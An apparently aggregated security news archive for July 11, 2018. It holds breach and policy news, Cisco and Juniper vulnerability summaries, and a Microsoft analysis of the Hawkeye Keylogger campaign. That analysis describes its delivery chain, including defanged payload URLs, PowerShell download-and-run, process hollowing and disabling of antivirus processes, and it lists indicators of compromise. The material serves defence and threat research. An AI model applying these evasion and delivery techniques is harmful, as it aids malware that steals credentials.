Daily Archives: July 11, 2018

Nintendo reportedly closes ‘unpatchable’ flaw in new Switch units

Nintendo has been ramping up its anti-piracy measures ever since a Switch hacking team discovered a vulnerability that allow people to run arbitrary code on all current consoles. In fact, it already gave the Switch hardware an overhaul to get rid of the flaw. While the updated console (codenamed "Mariko") hasn't hit the market yet, the gaming giant might have released patched units in the interim. According to Switch hardware hacker SciresM, some retail units already come with Nvidia Tegra chips that are protected against the security exploit called fusée gelée or "frozen rocket."

Via: Wololo, Gamasutra

Source: SciresM (Twitter)

Panda Restaurants Adds Business Intelligence Technology to 1,960 Stores

3xLOGIC, Inc., a leading provider of integrated, intelligent security solutions, and a three-time Deloitte Technology Fast 500™ winner, today announced that Panda Restaurant Group, Inc. (parent of Panda Express, Panda Inn and Hibachi-San) has completed deployment of 3xLOGIC’s VIGIL Trends Business Intelligence software to all of its North American locations.

Ease the Squeeze – Cyber Security with Small Teams

The competition is fierce; each team looking to find the best talent and get the most from every member. Sometimes, to fill a position you have to go to your bench, but this is a battle, and you are in it to win it. No, it isn’t the national team looking to grab top honors […]… Read More

The post Ease the Squeeze – Cyber Security with Small Teams appeared first on The State of Security.

Timehop Data Breach Affects 21million Users’



Timehop, an add-on app that reminisces people's good old days on different social media platforms, has suffered a data breach on  July 4th,  that affected 21 million users.

The stolen data includes names, email addresses, date of the birth,  and over 4.7 million users phone number that they linked to their accounts. However, users’ old social media posts "memories" were not compromised.

The hackers were able to enter the Timehop’s cloud computing account, as it was not protected by multi-factor authentication, they transferred the data, and attacked its database.

According to the company, they first noticed the breach within two hours it started and was able to interrupt it, but unfortunately, the user's data was stolen. Users’ private messages, financial data, social media content, and Timehop data were not affected.

“That stuff is what we cared about, that stuff was protected,” Timehop’s COO Rick Webb said in an interview with TechCrunch. “We have to make a mental note to think about everything else” going forward.

The company has started two-factor authentication on its internal systems and encrypting databases to prevent future breaches.

Cisco FireSIGHT System Software URL-Based Access Control Policy Bypass Vulnerability

A vulnerability in the detection engine of Cisco FireSIGHT System Software could allow an unauthenticated, remote attacker to bypass a URL-based access control policy that is configured to block traffic for an affected system.

The vulnerability exists because the affected software incorrectly handles TCP packets that are received out of order when a TCP SYN retransmission is issued. An attacker could exploit this vulnerability by sending a maliciously crafted connection through an affected device. A successful exploit could allow the attacker to bypass a URL-based access control policy that is configured to block traffic for the affected system.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180711-firesight-url-bypass


Security Impact Rating: Medium
CVE: CVE-2018-0384

Cisco Firepower System Software SSL Denial of Service Vulnerability

A vulnerability in the detection engine parsing of Security Socket Layer (SSL) protocol packets for Cisco Firepower System Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition due to the Snort process unexpectedly restarting.

The vulnerability is due to improper input handling of the SSL traffic. An attacker could exploit this vulnerability by sending a crafted SSL traffic to the detection engine on the targeted device. An exploit could allow the attacker to cause a DoS condition if the Snort process restarts and traffic inspection is bypassed or traffic is dropped.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180711-firepwr-ssl-dos


Security Impact Rating: Medium
CVE: CVE-2018-0385

Cisco Web Security Appliance Cross-Site Scripting Vulnerability

A vulnerability in the web-based management interface of Cisco Web Security Appliance (WSA) could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device.

The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive browser-based information.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180711-wsa-xss


Security Impact Rating: Medium
CVE: CVE-2018-0366

Cisco Digital Network Architecture Center Credential Logging Information Disclosure Vulnerability

A vulnerability in Cisco Digital Network Architecture (DNA) Center could allow an authenticated, local attacker to access sensitive information on an affected system.

The vulnerability is due to insufficient security restrictions imposed by the affected software. An attacker could exploit this vulnerability by accessing unprotected log files. A successful exploit could allow the attacker to access sensitive log files, which may include system credentials, on the affected device.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180711-dnac-id


Security Impact Rating: Medium
CVE: CVE-2018-0368

Cisco StarOS IPv4 Fragmentation Denial of Service Vulnerability

A vulnerability in the reassembly logic for fragmented IPv4 packets of Cisco StarOS running on virtual platforms could allow an unauthenticated, remote attacker to trigger a reload of the npusim process, resulting in a denial of service (DoS) condition. There are four instances of the npusim process running per Service Function (SF) instance, each handling a subset of all traffic flowing across the device. It is possible to trigger a reload of all four instances of the npusim process around the same time.

The vulnerability is due to improper handling of fragmented IPv4 packets containing options. An attacker could exploit this vulnerability by sending a malicious IPv4 packet across an affected device. An exploit could allow the attacker to trigger a restart of the npusim process, which will result in all traffic queued toward this instance of the npusim process to be dropped while the process is restarting. The npusim process typically restarts within less than a second.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180711-staros-dos


Security Impact Rating: High
CVE: CVE-2018-0369

Cisco FireSIGHT System Software File Policy Bypass Vulnerability

A vulnerability in the detection engine of Cisco FireSIGHT System Software could allow an unauthenticated, remote attacker to bypass a file policy that is configured to block the transfer of files to an affected system via FTP.

The vulnerability exists because the affected software incorrectly handles FTP control connections. An attacker could exploit this vulnerability by sending a maliciously crafted FTP connection to transfer a file to an affected device. A successful exploit could allow the attacker to bypass a file policy that is configured to apply the Block upload with reset action to FTP traffic.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180711-firesight-file-bypass


Security Impact Rating: Medium
CVE: CVE-2018-0383

Cisco Firepower System Software Detection Engine Denial of Service Vulnerability

A vulnerability in the detection engine of Cisco Firepower System Software could allow an unauthenticated, remote attacker to cause one of the detection engine processes to run out of memory and thus slow down traffic processing.

The vulnerability is due to improper handling of traffic when the Secure Sockets Layer (SSL) inspection policy is enabled. An attacker could exploit this vulnerability by sending malicious traffic through an affected device. An exploit could allow the attacker to increase the resource consumption of a single instance of the Snort detection engine on an affected device. This will lead to performance degradation and eventually the restart of the affected Snort process.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180711-firepower-dos


Security Impact Rating: Medium
CVE: CVE-2018-0370

Hacker Sold Stolen U.S. Military Drone Documents On Dark Web For Just $200

You never know what you will find on the hidden Internet 'Dark Web.' Just about an hour ago we reported about someone selling remote access linked to security systems at a major International airport for $10. It has been reported that a hacker was found selling sensitive US Air Force documents on the dark web for between $150 and $200. <!-- adsense --> Cybercrime tracker Recorded Future today

CVE-2018-11045

Pivotal Operations Manager, versions 2.1 prior to 2.1.6 and 2.0 prior to 2.0.15 and 1.12 prior to 1.12.22, contains a static Linux Random Number Generator (LRNG) seed file embedded in the appliance image. An attacker with knowledge of the exact version and IaaS of a running OpsManager could get the contents of the corresponding seed from the published image and therefore infer the initial state of the LRNG.

CVE-2016-0708

Applications deployed to Cloud Foundry, versions v166 through v227, may be vulnerable to a remote disclosure of information, including, but not limited to environment variables and bound service details. For applications to be vulnerable, they must have been staged using automatic buildpack detection, passed through the Java Buildpack detection script, and allow the serving of static content from within the deployed artifact. The default Apache Tomcat configuration in the affected java buildpack versions for some basic web application archive (WAR) packaged applications are vulnerable to this issue.

CVE-2018-11049

RSA Identity Governance and Lifecycle, RSA Via Lifecycle and Governance, and RSA IMG releases have an uncontrolled search vulnerability. The installation scripts set an environment variable in an unintended manner. A local authenticated malicious user could trick the root user to run malicious code on the targeted system.

Brazil’s Senate Passes General Data Protection Law

This post has been updated. 

As reported by Mundie e Advogados, on July 10, 2018, Brazil’s Federal Senate approved a Data Protection Bill of Law (the “Bill”). The Bill, which is inspired by the EU General Data Protection Regulation (“GDPR”), is expected to be sent to the Brazilian President in the coming days.

As reported by Mattos Filho, Veiga Filho, Marrey Jr e Quiroga Advogados, the Bill establishes a comprehensive data protection regime in Brazil and imposes detailed rules for the collection, use, processing and storage of personal data, both electronic and physical.

Key requirements of the Bill include:

  • National Data Protection Authority. The Bill calls for the establishment of a national data protection authority which will be responsible for regulating data protection, supervising compliance with the Bill and enforcing sanctions.
  • Data Protection Officer. The Bill requires businesses to appoint a data protection officer.
  • Legal Basis for Data Processing. Similar to the GDPR, the Bill provides that the processing of personal data may only be carried out where there is a legal basis for the processing, which may include, among other bases, where the processing is (1) done with the consent of the data subject, (2) necessary for compliance with a legal or regulatory obligation, (3) necessary for the fulfillment of an agreement, or (4) necessary to meet the legitimate interest of the data controller or third parties. The legal basis for data processing must be registered and documented. Processing of sensitive data (including, among other data elements, health information, biometric information and genetic data) is subject to additional restrictions.
  • Consent Requirements. Where consent of the data subject is relied upon for processing personal data, consent must be provided in advance and must be free, informed and unequivocal, and provided for a specific purpose. Data subjects may revoke consent at any time.
  • Data Breach Notification. The Bill requires notification of data breaches to the data protection authority and, in some circumstances, to affected data subjects.
  • Privacy by Design and Privacy Impact Assessments. The Bill requires organizations to adopt data protection measures as part of the creation of new products or technologies. The data protection authority will be empowered to require a privacy impact assessment in certain circumstances.
  • Data Transfer Restrictions. The Bill places restrictions on cross-border transfers of personal data. Such transfers are allowed (1) to countries deemed by the data protection authority to provide an adequate level of data protection, and (2) where effectuated using standard contractual clauses or other mechanisms approved by the data protection authority.

Noncompliance with the Bill can result in fines of up to two percent of gross sales, limited to 50 million reias (approximately USD 12.9 million) per violation. The Bill will take effect 18 months after it is published in Brazil’s Federal Gazette.

Cisco Releases Security Updates

Original release date: July 11, 2018

Cisco has released updates to address vulnerabilities affecting Cisco products. A remote attacker could exploit one of these vulnerabilities to take control of an affected system.

NCCIC encourages users and administrators to review the following Cisco Security Advisories and apply the necessary updates:


This product is provided subject to this Notification and this Privacy & Use policy.


IDG Contributor Network: How are small businesses adopting blockchain technology?

Since its original inception in 2008 to serve as a public transaction ledger for Bitcoin, blockchain technology has come a long way, evolving into something that is useful beyond just cryptocurrency exchanges. Today, blockchain technology – which tremendously increases security and transparency – can be applied to everything from cloud storage to business contracts to payment methods to supply chain management. Individuals, businesses and large enterprises alike are jumping on board to take advantage of the innovative technology and its incredible benefits.

In fact, there is a particularly large uptick in blockchain adoption among small businesses looking to reap the benefits of the technology to help protect and advance their companies – all without breaking the bank. Blockchain has truly become a coveted technological tool for small businesses spanning every industry including finance, real estate, healthcare, education, medicine and more. Since blockchain technology allows for increased security and transparency, this uptick in adoption makes perfect sense. But, before we dive further into specific blockchain applications for small businesses, let’s take a quick look at how the blockchain actually allows for increased security and transparency:

To read this article in full, please click here

Hacker Puts Airport’s Security System Access On Dark Web Sale For Just $10

If you can't find it on Google, you will definitely find it on the Dark Web. Black markets on the Dark web are not known for just buying drugs, it is a massive hidden network where you can buy pretty much anything you can imagine—from pornography, weapon, and counterfeit currencies, to hacking tools, exploits, malware, and zero-days. One such type of underground marketplace on Dark Web is

The CyberWire Daily Briefing 7.11.18

thecyberwire.com - Do you want trending information on hackers, exploits, and vulnerabilities every day for free? Subscribe now to the Recorded Future Cyber Daily. Chinese espionage services are, according to FireEye, …


Tweeted by @thecyberwire https://twitter.com/thecyberwire/status/1017119583503814656

Hawkeye Keylogger – Reborn v8: An in-depth campaign analysis

Much of cybercrime today is fueled by underground markets where malware and cybercriminal services are available for purchase. These markets in the deep web commoditize malware operations. Even novice cybercriminals can buy malware toolkits and other services they might need for malware campaigns: encryption, hosting, antimalware evasion, spamming, and many others.

Hawkeye Keylogger is an info-stealing malware thats being sold as malware-as-a-service. Over the years, the malware authors behind Hawkeye have improved the malware service, adding new capabilities and techniques. It was last used in a high-volume campaign in 2016.

This year marked the resurgence of Hawkeye. In April, malware authors started peddling a new version of the malware that they called Hawkeye Keylogger – Reborn v8. Not long after, on April 30, Office 365 Advanced Threat Protection (Office 365 ATP) detected a high-volume campaign that distributed the latest variants of this keylogger.

At the onset, Office 365 ATP blocked the email campaign and protected customers, 52% of whom are in the software and tech sector. Companies in the banking (11%), energy (8%), chemical (5%), and automotive (5%) industries are also among the top targets

Figure 1. Top industries targeted by the April 2018 Hawkeye campaign

Office 365 ATP uses intelligent systems that inspect attachments and links for malicious content to protect customers against threats like Hawkeye in real time. These automated systems include a robust detonation platform, heuristics, and machine learning models. Office 365 ATP uses intelligence from various sensors, including multiple capabilities in Windows Defender Advanced Threat Protection (Windows Defender ATP).

Windows Defender AV (a component of Windows Defender ATP) detected and blocked the malicious attachments used in the campaign in at least 40 countries. United Arab Emirates accounted for 19% of these file encounters, while the Netherlands (15%), the US (11%), South Africa (6%) and the UK (5%) make the rest of the top 5 countries that saw the lure documents used in the campaign. A combination of generic and heuristic protections in Windows Defender AV (TrojanDownloader:O97M/Donoff, Trojan:Win32/Tiggre!rfn, Trojan:Win32/Bluteal!rfn, VirTool:MSIL/NetInject.A) ensured these threats are blocked in customer environments.

Figure 2. Top countries that encountered malicious documents used in the Hawkeye campaign

As part of our job to protect customers from malware attacks, Office 365 ATP researchers monitor malware campaigns like Hawkeye and other developments in the cybercriminal landscape. Our in-depth investigation into malware campaigns like Hawkeye and many others adds to the vast threat intelligence we get from the Microsoft Intelligent Security Graph, which enables us to continuously raise the bar in security. Through the Intelligent Security Graph, security technologies in Microsoft 365 share signals and detections, allowing these technologies to automatically update protection and detection mechanisms, as well as orchestrate remediation across Microsoft 365.

Figure 3. Microsoft 365 threat protection against Hawkeye

Campaign overview

Despite its name, Hawkeye Keylogger – Reborn v8 is more than a common keylogger. Over time, its authors have integrated various modules that provide advanced functionalities like stealth and detection evasion, as well as credential theft and more.

Malware services like Hawkeye are advertised and sold in the deep web, which requires anonymity networks like Tor to access, etc. Interestingly, the Hawkeye authors advertised their malware and even published tutorial videos on a website on the surface web (that has since been taken down). Even more interesting, based on underground forums, it appears the malware authors have employed intermediary resellers, an example of how cybercriminal underground business models expand and evolve.

Our investigation into the April 2018 Hawkeye campaign shows that the cybercriminals have been preparing for the operation since February, when they registered the domains they later used in the campaign.

Typical of malware campaigns, the cybercriminals undertook the following steps:

  • Built malware samples and malware configuration files using a malware builder they acquired from the underground
  • Built weaponized documents to be used a social engineering lure (possibly by using another tool bought in the underground)
  • Packed or obfuscated the samples (using a customized open-source packer)
  • Registered domains for delivery of malware
  • Launched a spam campaign (possibly using a paid spam service) to distribute the malware

Like other malware toolkits, Hawkeye comes with an admin panel that cybercriminals use to monitor and control the attack.

Figure 4: Hawkeyes admin panel

Interestingly, some of the methods used in this Hawkeye campaign are consistent with previous attacks. This suggests that the cybercriminals behind this campaign may be the same group responsible for malware operations that delivered the remote access tool (RAT) Remcos and the info-stealing bot malware Loki. The following methods were used in these campaigns:

  • Multiple documents that create a complicated, multi-stage delivery chain
  • Redirections using shortened bit.ly links
  • Use of malicious macro, VBScript, and PowerShell scripts to run the malware; the Remcos campaign employed an exploit for CVE-2017-0199 but used the same domains
  • Consistent obfuscation technique across multiple samples

Point of entry

In late April, Office 365 ATP analysts spotted a new spam campaign with the subject line RFQ-GHFD456 ADCO 5647 deadline 7th May carrying a Word document attachment named Scan Copy 001.doc. While the attachments file name extension was .doc, it was in fact a malicious Office Open XML format document, which usually uses a .docx file name extension.

In total, the campaign used four different subject lines and five attachments.

Figure 5: Sample emails used in the Hawkeye campaign

Because the attachment contains malicious code, Microsoft Word opens with a security warning. The document uses a common social engineering lure: it displays a fake message and an instruction to Enable editing and Enable content.

Figure 6: The malicious document with social engineering lure

The document contains an embedded frame that connects to a remote location using a shortened URL.

Figure 7: frame in settings.rels.xml on the document

The frame loads an .rtf file from hxxp://bit[.]ly/Loadingwaitplez, which redirects to hxxp://stevemike-fireforce[.]info/work/doc/10.doc.

Figure 8: RTF loaded as a frame inside malicious document

The RTF has an embedded malicious .xlsx file with macro as an OLE object, which in turn contains a stream named PACKAGE that contains the .xlsx contents.

The macro script is mostly obfuscated, but the URL to the malware payload is notably in plaintext.

Figure 9: Obfuscated macro entry point

De-obfuscating the entire script makes its intention clear. The first section uses PowerShell and the System.Net.WebClient object to download the malware to the path C:\Users\Public\svchost32.exe and execute it.

The macro script then terminates both winword.exe and excel.exe. In specific scenarios where Microsoft Word overrides default settings and is running with administrator privileges, the macro can delete Windows Defender AVs malware definitions. It then changes the registry to disable Microsoft Offices security warnings and safety features.

In summary, the campaigns delivery comprises of multiple layers of components that aim to evade detection and possibly complicate analysis by researchers.

Figure 10: The campaigns delivery stages

The downloaded payload, svchost32.exe, is a .NET assembly named Millionare that is obfuscated using a custom version of ConfuserEx, a well-known open-source .NET obfuscator.

Figure 11: Obfuscated .NET assembly Millionare showing some of the scrambled names

The obfuscation modifies the .NET assemblys metadata such that all the class and variable names are non-meaningful and scrambled names in Unicode. This obfuscation causes some analysis tools like .NET Reflector to show some namespaces or classes names as blank, or in some cases, display parts of the code backwards.

Figure 12: .NET Reflector presenting the code backwards due to obfuscation

Finally, the .NET binary loads an unpacked .NET assembly, which includes DLL files embedded as resources in the portable executable (PE).

Figure 13: Loading the unpacked .NET assembly during run-time

Malware loader

The DLL that initiates the malicious behavior is embedded as a resource in the unpacked .NET assembly. It is loaded in memory using process hollowing, a code injection technique that involves spawning a new instance of a legitimate process and then hollowing it out, i.e., replacing the legitimate code with malware.

Figure 14: In-memory unpacking of the malware using process hollowing.

Unlike previous Hawkeye variants (v7), which loaded the main payload into its own process, the new Hawkeye malware injects its code into MSBuild.exe, RegAsm.exe, and VBC.exe, which are signed executables that ship with .NET framework. This is an attempt to masquerade as a legitimate process.

Figure 15: Obfuscated calls using .NET reflection to perform process hollowing injection routine that injects the malwares main payload into RegAsm.exe

Additionally, in the previous version, the process hollowing routine was written in C. In the new version, this routine is completely rewritten as a managed .NET that calls the native Windows API.

Figure 16: Process hollowing routine implemented in .NET using native API function calls

Malware functionalities

The new Hawkeye variants created by the latest version of the malware toolkit have multiple sophisticated functions for information theft and evading detection and analysis.

Information theft

The main keylogger functionality is implemented using hooks that monitor key presses, as well as mouse clicks and window context, along with clipboard hooks and screenshot capability.

It has specific modules for extracting and stealing credentials from the following applications:

  • Beyluxe Messenger
  • Core FTP
  • FileZilla
  • Minecraft (replaced the RuneScape module in previous version)

Like many other malware campaigns, it uses the legitimate BrowserPassView and MailPassView tools to dump credentials from the browser and email client. It also has modules for taking screenshots of the desktop, as well as the webcam, if it exists.

Notably, the malware has a mechanism to visit certain URLs for click-based monetization.

Stealth and anti-analysis

On top of the processes hollowing technique, this malware uses other methods for stealth, including alternate data streams that remove mark of the web (MOTW) from the malwares downloaded files.

This malware can be configured to delay execution by any number of seconds, a technique used mainly to avoid detection by various sandboxes.
It prevents antivirus software from running using an interesting technique. It adds keys to the registry location HKLM\Software\Windows NT\Current Version\Image File Execution Options and sets the Debugger value for certain processes to rundll32.exe, which prevents execution. It targets the following processes related to antivirus and other security software:

  • AvastSvc.exe
  • AvastUI.exe
  • avcenter.exe
  • avconfig.exe
  • avgcsrvx.exe
  • avgidsagent.exe
  • avgnt.exe
  • avgrsx.exe
  • avguard.exe
  • avgui.exe
  • avgwdsvc.exe
  • avp.exe
  • avscan.exe
  • bdagent.exe
  • ccuac.exe
  • ComboFix.exe
  • egui.exe
  • hijackthis.exe
  • instup.exe
  • keyscrambler.exe
  • mbam.exe
  • mbamgui.exe
  • mbampt.exe
  • mbamscheduler.exe
  • mbamservice.exe
  • MpCmdRun.exe
  • MSASCui.exe
  • MsMpEng.exe
  • msseces.exe
  • rstrui.exe
  • spybotsd.exe
  • wireshark.exe
  • zlclient.exe

Further, it blocks access to certain domains that are usually associated with antivirus or security updates. It does this by modifying the HOSTS file. The list of domains to be blocked is determined by the attacker using a config file.

This malware protects its own processes. It blocks the command prompt, registry editor, and task manager. It does this by modifying registry keys for local group policy administrative templates. It also constantly checks active windows and renders action buttons unusable if the window title matches ProcessHacker, Process Explorer, or Taskmgr.

Meanwhile, it prevents other malware from infecting the machine. It repeatedly scans and removes any new values to certain registry keys, stops associated processes, and deletes related files.

Hawkeye attempts to avoid automated analysis. The delay in execution is designed to defeat automated sandbox analysis that allots only a certain time for malware execution and analysis. It likewise attempts to evade manual analysis by monitoring windows and exiting when it finds the following analysis tools:

  • Sandboxie
  • Winsock Packet Editor Pro
  • Wireshark

Defending mailboxes, endpoints, and networks against persistent malware campaigns

Hawkeye illustrates the continuous evolution of malware in a threat landscape fueled by the cybercriminal underground. Malware services make malware accessible to even unsophisticated operators, while simultaneously making malware more durable with advanced techniques like in-memory unpacking and abuse of .NETs CLR engine for stealth. In this blog we covered the capabilities of its latest version, Hawkeye Keylogger – Reborn v8, highlighting some of the enhancements from the previous version. Given its history, Hawkeye is likely to release a new version in the future.

Organizations should continue educating their employees about spotting and preventing social engineering attacks. After all, Hawkeyes complicated infection chain begins with a social engineering email and lure document. A security-aware workforce will go a long way in securing networks against attacks.

More importantly, securing mailboxes, endpoints, and networks using advanced threat protection technologies can prevent attacks like Hawkeye, other malware operations, and sophisticated cyberattacks.

Our in-depth analysis of the latest version and our insight into the cybercriminal operation that drives this development allow us to proactively build robust protections against both known and unknown threats.

Office 365 Advanced Threat Protection (Office 365 ATP) protects mailboxes as well as files, online storage, and applications from malware campaigns like Hawkeye. It uses a robust detonation platform, heuristics, and machine learning to inspect attachments and links for malicious content in real-time, ensuring that emails that carry Hawkeye and other threats dont reach mailboxes and devices. Learn how to add Office 365 ATP to existing Exchange or Office 365 plans.

Windows Defender Antivirus (Windows Defender AV) provides an additional layer of protection by detecting malware delivered through email, as well as other infection vectors. Using local and cloud-based machine learning, Windows Defender AVs next-gen protection can block even new and unknown threats on Windows 10 and Windows 10 in S mode.

Additionally, endpoint detection and response (EDR) capabilities in Windows Defender Advanced Threat Protection (Windows Defender ATP) expose sophisticated and evasive malicious behavior, such as those used by Hawkeye. Sign up for free Windows Defender ATP trial.

Windows Defender ATPs rich detection libraries are powered by machine learning and allows security operations teams to detect and respond to anomalous attacks in the network. For example, machine learning detection algorithms surface the following alert when Hawkeye uses a malicious PowerShell to download the payload:

Figure 16: Windows Defender ATP alert for Hawkeyes malicious PowerShell component

Windows Defender ATP also has behavior-based machine learning algorithms that detect the payload itself:

Figure 17: Windows Defender ATP alert for Hawkeyes payload

These security technologies are part of the advanced threat protection solutions in Microsoft 365. Enhanced signal sharing across services in Windows, Office 365, and Enterprise Mobility + Security through the Microsoft Intelligent Security Graph enables the automatic update of protections and orchestration of remediation across Microsoft 365.

 

 

Office 365 ATP Research

 

 

Indicators of Compromise (Ioc)

Email subject lines

  • {EXT} NEW ORDER ENQUIRY #65563879884210#
  • B/L COPY FOR SHIPMENT
  • Betreff: URGENT ENQ FOR Equipment
  • RFQ-GHFD456 ADCO 5647 deadline 7th May

Attachment file names

  • Betreff URGENT ENQ FOR Equipment.doc
  • BILL OF LADING.doc
  • NEW ORDER ENQUIRY #65563879884210#.doc
  • Scan Copy 001.doc
  • Swift Copy.doc

Domains

  • lokipanelhostingpanel[.]gq
  • stellarball[.]com
  • stemtopx[.]com
  • stevemike-fireforce[.]info

Shortened redirector links

  • hxxp://bit[.]ly/ASD8239ASdmkWi38AS (was also used in a Remcos campaign)
  • hxxp://bit[.l]y/loadingpleaswaitrr
  • hxxp://bit[.l]y/Loadingwaitplez

Files (SHA-256)

  • d97f1248061353b15d460eb1a4740d0d61d3f2fcb41aa86ca6b1d0ff6990210a – .eml
  • 23475b23275e1722f545c4403e4aeddf528426fd242e1e5e17726adb67a494e6 – .eml
  • 02070ca81e0415a8df4b468a6f96298460e8b1ab157a8560dcc120b984ba723b – .eml
  • 79712cc97a19ae7e7e2a4b259e1a098a8dd4bb066d409631fb453b5203c1e9fe – .eml
  • 452cc04c8fc7197d50b2333ecc6111b07827051be75eb4380d9f1811fa94cbc2 – .eml
  • 95511672dce0bd95e882d7c851447f16a3488fd19c380c82a30927bac875672a – .eml
  • 1b778e81ee303688c32117c6663494616cec4db13d0dee7694031d77f0487f39 – .eml
  • 12e9b955d76fd0e769335da2487db2e273e9af55203af5421fc6220f3b1f695e – .eml
  • 12f138e5e511f9c75e14b76e0ee1f3c748e842dfb200ac1bfa43d81058a25a28 – .eml
  • 9dfbd57361c36d5e4bda9d442371fbaa6c32ae0e746ebaf59d4ec34d0c429221 – .docx (stage 1)
  • f1b58fd2bc8695effcabe8df9389eaa8c1f51cf4ec38737e4fbc777874b6e752 – .rtf (stage 2)
  • 5ad6cf87dd42622115f33b53523d0a659308abbbe3b48c7400cc51fd081bf4dd – .doc
  • 7db8d0ff64709d864102c7d29a3803a1099851642374a473e492a3bc2f2a7bae – .rtf
  • 01538c304e4ed77239fc4e31fb14c47604a768a7f9a2a0e7368693255b408420 – .rtf
  • d7ea3b7497f00eec39f8950a7f7cf7c340cf9bf0f8c404e9e677e7bf31ffe7be – .vbs
  • ccce59e6335c8cc6adf973406af1edb7dea5d8ded4a956984dff4ae587bcf0a8 – .exe (packed)
  • c73c58933a027725d42a38e92ad9fd3c9bbb1f8a23b3f97a0dd91e49c38a2a43 – .exe (unpacked)

*Updated 07/12/18 (Removed statement that Hawkeye Keylogger is also known as iSpy Keylogger

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

CVE-2018-0026

After Junos OS device reboot or upgrade, the stateless firewall filter configuration may not take effect. This issue can be verified by running the command: user@re0> show interfaces <interface_name> extensive | match filters" CAM destination filters: 0, CAM source filters: 0 Note: when the issue occurs, it does not show the applied firewall filter. The correct output should show the applied firewall filter, for example: user@re0> show interfaces <interface_name> extensive | match filters" CAM destination filters: 0, CAM source filters: 0 Input Filters: FIREWAL_FILTER_NAME-<interface_name> This issue affects firewall filters for every address family. Affected releases are Juniper Networks Junos OS: 15.1R4, 15.1R5, 15.1R6 and SRs based on these MRs. 15.1X8 versions prior to 15.1X8.3.

CVE-2018-0030

Receipt of a specific MPLS packet may cause MPC7/8/9, PTX-FPC3 (FPC-P1, FPC-P2) line cards or PTX1K to crash and restart. By continuously sending specific MPLS packets, an attacker can repeatedly crash the line cards or PTX1K causing a sustained Denial of Service. Affected releases are Juniper Networks Junos OS with MPC7/8/9 or PTX-FPC3 (FPC-P1, FPC-P2) installed and PTX1K: 15.1F versions prior to 15.1F6-S10; 15.1 versions prior to 15.1R4-S9, 15.1R6-S6, 15.1R7; 16.1 versions prior to 16.1R3-S8, 16.1R4-S9, 16.1R5-S4, 16.1R6-S3, 16.1R7; 16.1X65 versions prior to 16.1X65-D46; 16.2 versions prior to 16.2R1-S6, 16.2R2-S5, 16.2R3; 17.1 versions prior to 17.1R1-S7, 17.1R2-S7, 17.1R3; 17.2 versions prior to 17.2R1-S4, 17.2R2-S4, 17.2R3; 17.2X75 versions prior to 17.2X75-D70, 17.2X75-D90; 17.3 versions prior to 17.3R1-S4, 17.3R2, 17.4 versions prior to 17.4R1-S2, 17.4R2. Refer to KB25385 for more information about PFE line cards.

CVE-2018-0029

While experiencing a broadcast storm, placing the fxp0 interface into promiscuous mode via the 'monitor traffic interface fxp0' can cause the system to crash and restart (vmcore). This issue only affects Junos OS 15.1 and later releases, and affects both single core and multi-core REs. Releases prior to Junos OS 15.1 are unaffected by this vulnerability. Affected releases are Juniper Networks Junos OS: 15.1 versions prior to 15.1F6-S11, 15.1R4-S9, 15.1R6-S6, 15.1R7; 15.1X49 versions prior to 15.1X49-D140; 15.1X53 versions prior to 15.1X53-D59 on EX2300/EX3400; 15.1X53 versions prior to 15.1X53-D67 on QFX10K; 15.1X53 versions prior to 15.1X53-D233 on QFX5200/QFX5110; 15.1X53 versions prior to 15.1X53-D471, 15.1X53-D490 on NFX; 16.1 versions prior to 16.1R3-S8, 16.1R5-S4, 16.1R6-S1, 16.1R7; 16.2 versions prior to 16.2R1-S6, 16.2R2-S5, 16.2R3; 17.1 versions prior to 17.1R1-S7, 17.1R2-S7, 17.1R3; 17.2 versions prior to 17.2R1-S6, 17.2R2-S4, 17.2R3; 17.2X75 versions prior to 17.2X75-D90, 17.2X75-D110; 17.3 versions prior to 17.3R1-S4, 17.3R2; 17.4 versions prior to 17.4R1-S3, 17.4R2.

CVE-2018-0041

Juniper Networks Contrail Service Orchestration releases prior to 3.3.0 use hardcoded credentials to access Keystone service. These credentials allow network based attackers unauthorized access to information stored in keystone.

CVE-2018-0025

When an SRX Series device is configured to use HTTP/HTTPS pass-through authentication services, a client sending authentication credentials in the initial HTTP/HTTPS session is at risk that these credentials may be captured during follow-on HTTP/HTTPS requests by a malicious actor through a man-in-the-middle attack or by authentic servers subverted by malicious actors. FTP, and Telnet pass-through authentication services are not affected. Affected releases are Juniper Networks SRX Series: 12.1X46 versions prior to 12.1X46-D67 on SRX Series; 12.3X48 versions prior to 12.3X48-D25 on SRX Series; 15.1X49 versions prior to 15.1X49-D35 on SRX Series.

CVE-2018-0040

Juniper Networks Contrail Service Orchestrator versions prior to 4.0.0 use hardcoded cryptographic certificates and keys in some cases, which may allow network based attackers to gain unauthorized access to services.

CVE-2018-0035

